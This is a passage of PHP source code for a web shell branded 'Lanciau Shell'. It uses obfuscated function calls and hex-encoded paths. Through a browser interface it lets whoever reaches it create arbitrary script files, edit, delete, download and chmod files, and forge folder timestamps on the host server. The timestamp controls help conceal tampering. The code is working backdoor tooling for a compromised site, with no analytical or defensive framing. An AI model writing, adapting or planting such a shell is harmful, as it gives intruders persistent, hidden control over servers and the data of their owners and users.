href='?dir=".hex($fungsi[7]())."&action=delete_folder'><i class='bi bi-trash-fill'></i></a> </div> <div class='card card-body text-dark input-group mb-3'> <p>Are you sure to zip : " . basename($dir) . " ?</p> <form method='POST'> <a class='btn btn-danger btn-block btn-sm' href='?dir=" . dirname($dir) . "'>No</a> <input type='submit' name='yeah' class='btn btn-success btn-block btn-sm' value='Yes'> </form> </div>"; } // Chmod Folder if ($_7['action'] == 'chmod_folder') { s(); $FolderChmod = substr(sprintf('%o', fileperms($dir)), -4); function chmod_folder($dir, $permissions) { if (is_dir($dir)) { if (chmod($dir, octdec($permissions))) { return true; } else { return false; } } else { return false; } } if ($_7['yeah']) { $permissions = $_7['permissions']; if (chmod_folder($dir, $permissions)) { echo '<strong>Chmod folder</strong> ok! ' . ok() . '<a class="btn-close" href="?path=' . dirname($dir) . '"></a></div>'; } else { echo '<strong>Chmod folder</strong> fail! ' . er() . '<a class="btn-close" href="?path=' . dirname($dir) . '"></a></div>'; } } echo " <div class='btn-group mb-3'> <a class='btn btn-outline-light btn-sm' href='?dir=".hex($fungsi[7]())."&action=rename_folder'><i class='bi bi-pencil-fill'></i></a> <a class='btn btn-outline-light btn-sm' href='?dir=".hex($fungsi[7]())."&action=zip_folder'><i class='bi bi-file-zip-fill'></i></a> <a class='btn btn-outline-light btn-sm' href='?dir=".hex($fungsi[7]())."&action=touch_folder'><i class='bi bi-calendar'></i></a> <a class='btn btn-outline-light btn-sm' href='?dir=".hex($fungsi[7]())."&action=chmod_folder'><i class='bi bi-file-lock-fill'></i></a> <a class='btn btn-outline-light btn-sm' href='?dir=".hex($fungsi[7]())."&action=delete_folder'><i class='bi bi-trash-fill'></i></a> </div> <div class='card card-body text-dark input-group mb-3'> <p>Set permissions for : " . basename($dir) . "</p> <form method='POST'> <input type='text' name='permissions' value='$FolderChmod' required> <a class='btn btn-danger btn-block btn-sm' href='?dir=" . dirname($dir) . "'>Cancel</a> <input type='submit' name='yeah' class='btn btn-success btn-block btn-sm' value='Set Permissions'> </form> </div>"; } // Touch Folder if ($_7['action'] == 'touch_folder') { s(); $folderTimestamp = date('d-m-Y H:i:s', filemtime($dir)); if ($_7['yeahx']) { $old = $dir; $new = $_POST['new_touch']; if (strtotime($new) !== false) { if (touch($old, strtotime($new))) { echo '<strong>Touch folder</strong> ok! ' . ok() . '<a class="btn-close" href="?path=' . dirname($dir) . '"></a></div>'; } else { echo '<strong>Touch folder</strong> fail! ' . er() . '<a class="btn-close" href="?path=' . dirname($dir) . '"></a></div>'; } } else { echo '<div class="alert alert-warning alert-dismissible fade show my-3" role="alert"> <strong>Touch folder</strong> invalid timestamp format! <button type="button" class="btn-close" data-bs-dismiss="alert" aria-label="Close"></button> </div>'; } } echo " <div class='btn-group mb-3'> <a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=rename_folder'><i class='bi bi-pencil-fill'></i></a> <a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=zip_folder'><i class='bi bi-file-zip-fill'></i></a> <a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=touch_folder'><i class='bi bi-calendar'></i></a> <a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=chmod_folder'><i class='bi bi-file-lock-fill'></i></a> <a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=delete_folder'><i class='bi bi-trash-fill'></i></a> </div>"; echo " <div class='card card-body text-dark input-group mb-3'> <p>Are you sure to touch the folder: " . basename($dir) . " ?</p> <form method='POST'> <input type='text' name='new_touch' id='new_touch' class='form-control' value='$folderTimestamp' required> <a class='btn btn-danger btn-block btn-sm' href='?dir=" . hex($dir) . "'>No</a> <input type='submit' name='yeahx' class='btn btn-success btn-block btn-sm' value='Yes'> </form> </div>"; } // File New if(isset($_7['filenew'])) { s(); if(isset($_7['bikin'])){ $name = $_7['name_file']; $contents_file = $_7['contents_file']; foreach ($name as $name_file){ $handle = @fopen("$name_file", "w"); if($contents_file){ $create = @fwrite($handle, $contents_file); } else { $create = $handle; } } if($create){ echo "<script>window.location='?path=".hex($path)."'</script>"; } else { echo '<strong>Create file</strong> fail! '.er().'</div>'; } } echo " <div class='mb-3'> <form method='POST'> <i class='bi bi-file-earmark'></i> Filename: <input class='form-control form-control-sm' type='text' name='name_file[]' placeholder='filename' $_r> <i class='bi bi-file-earmark'></i> Your script: <textarea class='form-control form-control-sm' name='contents_file' rows='7' placeholder='your script' $_r></textarea> <div class='d-grid gap-2'> <input class='btn btn-outline-light btn-sm' type='submit' name='bikin' value='create'> </div> </form> </div>"; } // Dir New if(isset($_7['dirnew'])) { s(); if(isset($_7['create'])){ $name = $_7['name_dir']; foreach ($name as $name_dir){ $folder = preg_replace("([^\w\s\d\-_~,;:\[\]\(\].]|[\.]{2,})", '', $name_dir); $fd = @mkdir ($folder); } if($fd){ echo "<script>window.location='?path=".hex($path)."'</script>"; } else { echo '<strong>Create dir</strong> fail! '.er().'</div>'; } } echo " <div class='mb-3'> <form method='POST'> <i class='bi bi-folder'></i> Name directory: <div class='input-group mb-3'> <input class='form-control form-control-sm' type='text' name='name_dir[]' placeholder='Dir name' $_r> <input class='btn btn-outline-light btn-sm' type='submit' name='create' value='create dir'> </div> </form> </div>"; } echo ' <div class="table-responsive"> <table class="table table-hover table-dark text-light"> <thead> <tr> <td class="text-center">name</td><td class="text-center">type</td> <td class="text-center">last edit</td> <td class="text-center">size</td> <td class="text-center">owner<gr>/</gr>group</td> <td class="text-center">permision</td> <td class="text-center">action</td> </tr> </thead> <tbody class="text-nowrap"> <tr> <td><i class="bi bi-folder2-open"></i><a class="text-decoration-none" href="?dir='.dirname($dir).'">..</a></td><td></td><td></td><td></td><td></td><td></td><td class="text-center"> <div class="btn-group"> <a class="btn btn-outline-light btn-sm" href="?filenew&path='.$dir.'"><i class="bi bi-file-earmark-plus-fill"></i></a> <a class="btn btn-outline-light btn-sm" href="?dirnew&path='.$dir.'"><i class="bi bi-folder-plus"></i></a> </div> </td> </tr>'; foreach($scand as $dir){ $dt = date("d-m-Y G:i", filemtime("$path/$dir")); if(strlen($dir) > 50) { $_d = substr($dir, 0, 50)."..."; }else{ $_d = $dir; } if($GLOBALS['fungsi'][5]('posix_getpwuid')) { $downer = @posix_getpwuid(fileowner("$path/$dir")); $downer = $downer['name']; } else { $downer = fileowner("$path/$dir"); } if($GLOBALS['fungsi'][5]('posix_getgrgid')) { $dgrp = @posix_getgrgid(filegroup("$path/$dir")); $dgrp = $dgrp['name']; } else { $dgrp = filegroup("$path/$dir"); } if(!$fungsi[1]($path.'/'.$file)) continue; $size = filesize($path.'/'.$file)/1024; $size = round($size,3); if($size >= 1024){ $size = round($size/1024,2).' MB'; }else{ $size = $size.' KB'; } if(!$fungsi[1]($path.'/'.$dir) || $dir == '.' || $dir == '..') continue; echo " <tr> <td><i class='bi bi-folder-fill'></i><a class='text-decoration-none listdir' href='?path=".hex($path.'/'.$dir)."'>$_d</a></td> <td class='text-center'>dir</td> <td class='text-center'>$dt</td> <td class='text-center'>-</td> <td class='text-center'>$downer<gr>/</gr>$dgrp</td> <td class='text-center'>"; if(is_writable($path.'/'.$dir)) echo '<gr>'; elseif(!is_readable($path.'/'.$dir)) echo '<rd>'; echo p($path.'/'.$dir); if(is_writable($path.'/'.$dir) || !is_readable($path.'/'.$dir)) echo '</font></center></td>'; echo " <td class='text-center'> <div class='btn-group'> <a class='btn btn-outline-light btn-sm' href='?dir=".hex($path.'/'.$dir)."&action=rename_folder'><i class='bi bi-pencil-fill'></i></a> <a class='btn btn-outline-light btn-sm' href='?dir=".hex($path.'/'.$dir)."&action=zip_folder'><i class='bi bi-file-zip-fill'></i></a> <a class='btn btn-outline-light btn-sm' href='?dir=".hex($path.'/'.$dir)."&action=touch_folder'><i class='bi bi-calendar'></i></a> <a class='btn btn-outline-light btn-sm' href='?dir=".hex($path.'/'.$dir)."&action=chmod_folder'><i class='bi bi-file-lock-fill'></i></a> <a class='btn btn-outline-light btn-sm' href='?dir=".hex($path.'/'.$dir)."&action=delete_folder'><i class='bi bi-trash-fill'></i></a> </div> </td> </tr>"; } foreach($scand as $file){ $ft = date("d-m-Y G:i", filemtime("$path/$file")); if($GLOBALS['fungsi'][5]('posix_getpwuid')) { $fowner = @posix_getpwuid(fileowner("$path/$file")); $fowner = $fowner['name']; } else { $fowner = fileowner("$path/$file"); } if($GLOBALS['fungsi'][5]('posix_getgrgid')) { $fgrp = @posix_getgrgid(filegroup("$path/$file")); $fgrp = $fgrp['name']; } else { $fgrp = filegroup("$path/$file"); } if(!$fungsi[3]($path.'/'.$file)) continue; if(strlen($file) > 50) { $_f = substr($file, 0, 50)."...-.".$ext; }else{ $_f = $file; } echo " <tr> <td><i class='bi bi-file-earmark-text-fill'></i><a class='text-decoration-none listdir' href='?dir=".hex($fungsi[7]())."&action=view&opn=$file'>$_f</a></td> <td class='text-center'>file</td> <td class='text-center'>$ft</td> <td class='text-center'>".sz(filesize($file))."</td> <td class='text-center'>$fowner<gr>/</gr>$fgrp</td> <td class='text-center'>";if(is_writable($path.'/'.$file)) echo '<gr>'; elseif(!is_readable($path.'/'.$file)) echo '<rd>'; echo p($path.'/'.$file); if(is_writable($path.'/'.$file) || !is_readable($path.'/'.$file)) echo '</gr></rd></td>'; echo " <td class='text-center'> <div class='btn-group'> <a class='btn btn-outline-light btn-sm' href='?dir=".hex($fungsi[7]())."&action=view&opn=$path/$file'><i class='bi bi-eye-fill'></i></a> <a class='btn btn-outline-light btn-sm' href='?dir=".hex($fungsi[7]())."&action=edit&opn=$path/$file'><i class='bi bi-pencil-square'></i></a> <a class='btn btn-outline-light btn-sm' href='?dir=".hex($fungsi[7]())."&action=rename&opn=$path/$file'><i class='bi bi-pencil-fill'></i></a> <a class='btn btn-outline-light btn-sm' href='?dir=".hex($fungsi[7]())."&action=unzip_file&opn=$file'><i class='bi bi-file-zip-fill'></i></a> <a class='btn btn-outline-light btn-sm' href='?dir=".hex($fungsi[7]())."&action=touch_file&opn=$path/$file'><i class='bi bi-calendar'></i></a> <a class='btn btn-outline-light btn-sm' href='?dir=".hex($fungsi[7]())."&action=chmod&opn=$path/$file'><i class='bi bi-file-lock-fill'></i></a> <a class='btn btn-outline-light btn-sm' href='?dir=".hex($fungsi[7]())."&action=delete_file&opn=$path/$file'><i class='bi bi-trash-fill'></i></a> <a class='btn btn-outline-light btn-sm' href='?dir=".hex($fungsi[7]())."&action=download&opn=$path/$file'><i class='bi bi-download'></i></a> </div> </td> </tr>"; } ?> </tbody> </table> </div><div class='text-secondary'>© Lanciau Shell - 0xA</div> </div> </div> </body> </html>